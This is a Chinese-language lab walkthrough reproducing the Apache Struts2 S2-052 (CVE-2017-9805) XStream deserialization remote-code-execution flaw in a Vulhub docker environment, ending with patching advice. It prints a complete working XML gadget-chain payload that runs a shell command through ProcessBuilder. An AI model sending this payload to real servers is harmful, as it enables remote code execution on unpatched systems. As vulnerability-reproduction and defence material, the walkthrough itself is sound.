溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

發(fā)布時(shí)間:2022-01-15 10:19:37 來源:億速云 閱讀:175 作者:柒染 欄目:安全技術(shù)

這篇文章的內(nèi)容主要圍繞如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)進(jìn)行講述,文章內(nèi)容清晰易懂,條理清晰,非常適合新手學(xué)習(xí),值得大家去閱讀。感興趣的朋友可以跟隨小編一起閱讀吧。希望大家通過這篇文章有所收獲!

0x00漏洞簡述

2017年9月5日,Apache Struts發(fā)布最新的安全公告,Apache Struts 2.5.x的REST插件存在遠(yuǎn)程代碼執(zhí)行的高危漏洞,漏洞編號為CVE-2017-9805(S2-052)。漏洞的成因是由于使用XStreamHandler反序列化XStream實(shí)例的時(shí)候沒有任何類型過濾導(dǎo)致遠(yuǎn)程代碼執(zhí)行

0x01影響版本

Apache Struts 2.5 – Struts 2.5.12

Apache Struts 2.1.2 – Struts 2.3.33

0x02漏洞復(fù)現(xiàn)

虛擬機(jī)部署docker安裝Vulhub一鍵搭建漏洞測試靶場環(huán)境。

docker-compose up -d

1、訪問漏洞環(huán)境

http://192.168.60.131:8080/orders.xhtml

如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

2、通過編輯進(jìn)行POST數(shù)據(jù)的修改

如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

3、該rest-plugin會(huì)根據(jù)URI擴(kuò)展名或 Content-Type來判斷解析文件方式, 需要修改xhtml或修改Content-Type頭為application/xml,即可在Body中傳遞XML數(shù)據(jù)。

4、抓包對Content-Type類型修改

如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

5、XML格式Payload數(shù)據(jù)包構(gòu)造

<map>

<entry>

<jdk.nashorn.internal.objects.NativeString>

<flags>0</flags>

<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">

<dataHandler>

<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">

<is class="javax.crypto.CipherInputStream">

<cipher class="javax.crypto.NullCipher">

<initialized>false</initialized>

<opmode>0</opmode>

<serviceIterator class="javax.imageio.spi.FilterIterator">

<iter class="javax.imageio.spi.FilterIterator">

<iter class="java.util.Collections$EmptyIterator"/>

<next class="java.lang.ProcessBuilder">

<command>

<string>touch</string>

<string>/tmp/yunzui.txt</string>

</command>

<redirectErrorStream>false</redirectErrorStream>

</next>

</iter>

<filter class="javax.imageio.ImageIO$ContainsFilter">

<method>

<class>java.lang.ProcessBuilder</class>

<name>start</name>

<parameter-types/>

</method>

<name>foo</name>

</filter>

<next class="string">foo</next>

</serviceIterator>

<lock/>

</cipher>

<input class="java.lang.ProcessBuilder$NullInputStream"/>

<ibuffer/>

<done>false</done>

<ostart>0</ostart>

<ofinish>0</ofinish>

<closed>false</closed>

</is>

<consumed>false</consumed>

</dataSource>

<transferFlavors/>

</dataHandler>

<dataLen>0</dataLen>

</value>

</jdk.nashorn.internal.objects.NativeString>

<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

</entry>

<entry>

<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>

</map>

6、通過payload進(jìn)行漏洞利用,執(zhí)行命令,返回響應(yīng)500狀態(tài)碼,但是執(zhí)行成功。

touch /tmp/yunzui.txt

如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

7、命令執(zhí)行結(jié)果進(jìn)入docker查看,成功執(zhí)行。

docker-compose exec struts2 bash

ls -al /tmp

如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)

0x03修復(fù)建議

1、升級Apache struts 2.5.13或2.3.34版本

2、如果系統(tǒng)沒有使用Struts REST插件,那么可以直接刪除Struts REST插件,或者在配置文件中加入如下代碼,限制服務(wù)端文件的擴(kuò)展名

<constant name="struts.action.extension" value="xhtml,,json" />

3、限制服務(wù)端擴(kuò)展類型,刪除XML支持

感謝你的閱讀,相信你對“如何實(shí)現(xiàn)Apache Struts2--052遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)”這一問題有一定的了解,快去動(dòng)手實(shí)踐吧,如果想了解更多相關(guān)知識(shí)點(diǎn),可以關(guān)注億速云網(wǎng)站!小編會(huì)繼續(xù)為大家?guī)砀玫奈恼拢?/p>

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI